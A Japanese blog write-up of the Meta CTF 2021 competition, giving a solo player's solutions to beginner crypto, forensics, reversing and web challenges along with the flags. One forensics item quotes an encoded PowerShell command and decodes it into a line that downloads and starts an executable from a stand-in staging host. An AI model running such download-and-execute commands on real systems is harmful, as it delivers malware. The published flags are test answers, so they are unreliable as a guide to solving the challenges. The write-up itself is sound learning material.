概要
本記事は、先日参加したMeta CTF 2021のWrite Upです。
(金, 03 12月 2021, 20:00 UTC — 日, 05 12月 2021, 20:00 UTC) に、今回も1人チームで参加しました。
結果は1375点で、全体1950チーム中924位、Non-Student部門では、913チーム中463位でした。
解けた問題については自分の解答を、解けなかった問題に関しては自分なりの解答への道筋を記載しておきます。
解けなかった問題や、他の方のWriteUpのリンク等は随時追加していこうと思います。
解けた問題(Assignments that were solved)
Binary Exploitation
None.
要復習。
Cryptography
Thnks fr th Pwds (solved by 1126 teams)100
On a red team engagement, you discover a text file on an administrator’s desktop with all of their passwords - you now have the keys to the kingdom!
During the engagement debrief, you explain what you found and how you were able to access so many systems. The administrator says that's impossible, because they encrypted all of the passwords in the file.
Here’s an example of one of their “encrypted” passwords: TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ==
See if you’re able to recover the Administrator's password.
“encrypted” passwords:TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ==をBase64でデコードするだけ。
MetaCTF{encoding_is_N0T_the_same_as_encryption!!}
Wrong Way on a One Way Street (solved by 1039 teams)100
Hashing is a system by which information is encrypted such that it can never be decrypted... theoretically. Websites will often hash passwords so that if their passwords are ever leaked, bad actors won't actually learn the user's password; they'll just get an encrypted form of it. However, the same password will always hash to the same ciphertext, so if the attacker can guess your password, they can figure out the hash. Can you guess the password for this hash? cb78e77e659c1648416cf5ac43fca4b65eeaefe1
提示されているハッシュ値cb78e77e659c1648416cf5ac43fca4b65eeaefe1でヒットする値がないか調べたら、サクっと見つかりました。
検索結果 - Best MD5 & SHA1 Password Decrypter | Hash Toolkit
babyloka13
参考
- MD5の変換・逆変換ができるサイト「Hash Toolkit」 - WEB制作の解決策FAQブログ
- Best MD5 & SHA1 Password Decrypter | Hash Toolkit | cb78e77e659c1648416cf5ac43fca4b65eeaefe1
Forensics
まだ解けそうな問題がいくつかあったから、この分野にもう少し注力したら良かったかな・・・
Magic in the Hex (solved by 1115 teams)100
Sometimes in forensics, we run into files that have odd or unknown file extensions. In these cases, it's helpful to look at some of the file format signatures to figure out what they are. We use something called "magic bytes" which are the first few bytes of a file.
What is the ASCII representation of the magic bytes for a VMDK file? The flag format will be 3-4 letters (there are two correct answers).
VMDKファイルのマジックナンバーのASCII表現は、KDMVです。
参考
My Logs Know What You Did (solved by 997 teams)125
While investigating an incident, you identify a suspicious powershell command that was run on a compromised system ... can you figure out what it was doing?
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn
PowerShell問題。最近この系統の問題増えてるのかな?
問題文のTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn部分をBase64でデコードすると、以下のコマンドを実行している事が分かる。
New-Object System.Net.WebClient).DownloadFile('http://MetaCTF{super_sus_st4ging_site_d0t_c0m}/_bad.exe','bad.exe');Start-Process 'bad.exe'
参考
PowerShell難読化の基礎 (3) - Binary Pulsar
Sharing Files and Passwords (solved by 967 teams)150
FTP servers are made to share files, but if its communications are not encrypted, it might be sharing passwords as well. The password in this pcap to get the flag
配布されているpcapファイルをWiresharkで開いて、FTP通信を追うと題意のパスワードが見える。
ftp_is_better_than_dropbox
Still Believe in Magic? (solved by 924 teams)150
We found an archive with a file in it, but there was no file extension so we're not sure what it is. Can you figure out what kind of file it is and then open it?
とりあえず、配布されたファイルを解凍してみると、magicという謎のファイルが出現。
このファイルをfileコマンドで調べてみると、どうやらzipファイルの模様。
# file magic
magic: Zip archive data, at least v2.0 to extract, compression method=deflate
なので、このmagicに対してunzipコマンド叩くと、magic.txtが出現。
このファイルに、フラグが記載されていた。
MetaCTF{was_it_a_magic_trick_or_magic_bytes?}
Reconnaissance
None.
初めて遭遇した形式。
偵察?MITRA ATT&CKは知ってたけど、正答まで辿り着けなかった・・・
要復習。
Reverse Engineering
There Are No Strings on Me (solved by 1034 teams)100
We've got this program that's supposed to check a password, and we're not quite sure how it works. Could you take a look at it and see about finding the password it's looking for?
download
ltraceしたらすぐ分かりました。
# ltrace -s 100 ./strings
printf("Input the password: ") = 20
fgets(Input the password: 1234
"1234\n", 256, 0x7f472bb619a0) = 0x7fff6a210350
strcmp("1234\n", "MetaCTF{this_is_the_most_secure_ever}\n") = -28
puts("Begone!!"Begone!!
) = 9
+++ exited (status 0) +++
Web Exploitation
Under Inspection (solved by 1113 teams)100
Someone made this site for the Autobots to chat with each other. Seems like the Decepticons have found the site too and made accounts.
One of the Autobot accounts has a flag that they're trying to keep hidden from the Decepticons, can you figure out which account it is and steal it?
問題文で提示されたサイトにアクセスすると、ログイン画面に遷移。
とりあえず、適当なIDとパスワードでログインし、Burpで通信を見てみたが、ログイン処理時の通信が発生してない・・・?
ソースを覗いてみると、ID/Passが直接記載されてて、IDとパスワードが正しい場合のみ画面に表示されていた。
Welcome, Jazz. The flag is MetaCTF{do_it_with_style_or_dont_do_it_at_all}
Looking Inwards (solved by 180 teams)300
It's always fun to take a moment of introspection, in this case not about oneself, but about our field (development/security). For example when it comes to API design, first there were SOAP endpoints primarily based on XML. Then as Web 2.0 came along, RESTful APIs became all the rage. Recently, technologies like GraphQL began to gain traction.
With new technologies, though, come new classes of attacks. Check out this basic GraphQL API server. To get you started, here's one cool thing it can do: If you send it a query in the form of echo(message: "message_here"), it will respond with what you said. Can you get it to give you the flag?
GraphQL問題。
とりあえず、問題文のURLからget-graphql-schemaで情報を抜き出す。
# get-graphql-schema https://metaproblems.com/bb0e56b64e0a17b47450457b07fd2353/graphql.php
type Mutation {
sum(x: Int!, y: Int!): Int!
}
type Query {
echo(message: String!): String!
super_super_secret_flag_dispenser(authorized: Boolean!): String!
}
問題文の例を参考に、super_super_secret_flag_dispenserのデータを取るとフラグが返ってくる。
{"data":{"super_super_secret_flag_dispenser":"MetaCTF{look_deep_and_who_knows_what_you_might_find}"}}
参考
自分のWriteUp - SECCON Beginners CTF 2020 Write Up - Qiita
SECCON Beginners 2020 Writeup (profiler, Somen) - Ryoto's Blog
[SECCON Beginner CTF 2020 Web 全解説 - はまやんはまやんはまやん]
(https://blog.hamayanhamayan.com/entry/2020/05/25/131102)
GitHub - prisma-labs/get-graphql-schema: Fetch and print the GraphQL schema from a GraphQL HTTP endpoint. (Can be used for Relay Modern.)
Other
解いた問題以外、そもそも問題文すら見てなかった・・・・・・・
時間配分とかちゃんと考えなきゃ・・・・
Flag Format (solved by 1264 teams)50
Most of our flags are formatted like this: MetaCTF{string_separated_with_und3rscores}
If the flag is not in that format, we specify what the flag format should be instead. If you solve this challenge, make sure to tell your teammates about the flag format!
Welcome問題。
このCTFでのフラグのフォーマットは、MetaCTF{string_separated_with_und3rscores}
This Ain't a Scene, It's an Encryption Race (solved by 1075 teams)100
Ransomware attacks continue to negatively impact businesses around the world. What is the Mitre ATT&CK technique ID for the encryption of data in an environment to disrupt business operations?
The flag format will be T####.
Mitre ATT&CKについての問題。
題意を満たすのはT1486
参考
解けなかった問題(Unanswered Assignments)
Web Exploitation
WAS my flag? Part I (solved by 111 teams)250
Leaky Logs (solved by 133 teams)300
Yummy Vegetables (solved by 205 teams)300
Custom Blog (solved by 86 teams)350
Web Inspection (solved by 46 teams)375
Look, if you had one shot (solved by 30 teams)400
WAS my flag? Part II (solved by 33 teams)475
Other
感想
最近、CTFへのモチベーションが高くて、色々と参加してるけど、WriteUp書くのが間に合ってない・・・
TryHackMeとかもやりたいし、他の趣味や就職活動もしなきゃだけど、後手後手になるくらいには時間がない・・・・
お仕事募集中です、
他の方々のWriteUpのリンク集
ある程度増えてきたら、別記事にして投稿しようと思います。(2021/05/25)